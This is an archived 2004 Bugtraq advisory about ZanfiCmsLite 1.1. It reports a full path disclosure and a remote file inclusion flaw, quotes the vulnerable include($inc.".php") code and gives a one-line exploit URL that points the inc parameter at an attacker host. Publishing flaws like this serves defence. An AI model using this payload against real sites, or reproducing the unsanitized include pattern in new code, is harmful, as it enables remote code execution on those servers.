lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 11 Oct 2004 12:59:48 -0000
From: Lin Xiaofeng <Cracklove@...il.Com>
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in ZanfiCmsLite




********************************** 
*AuThor:Cracklove                * 
*emA!l:Cracklove[at]Gmail[dot]Com* 
*HoMePaGe:http://ProxySky.com    * 
********************************** 

[Info] 

Website: http://www.zanfi.nl 
Version: 1.1,The Newest Version 
Problem: Full path disclosure,Include file 

[Vuls] 

1.Full path disclosure: 

Let's try to request like this: 

http://localhost/cms/adm_pages.php 

and we get standard error messages like that: 

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2 
No blocks in the table 

The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc. 


2.Include file 

Ok let's open ./index.php,We see 

if (!isset($inc)): 
    include ("home.php"); 
else: 
    include ($inc.".php"); 
endif; 

O Yeah!See u Again Include Vul! 

[Exploit] 

http://target/index.php?inc=http://[Attacker] 

[Fix] 

Vuls has been reported to autuor,No reply yet. 

[Greetings] 

Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm. 

http://www.proxysky.com/vulz/show.php?id=3

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ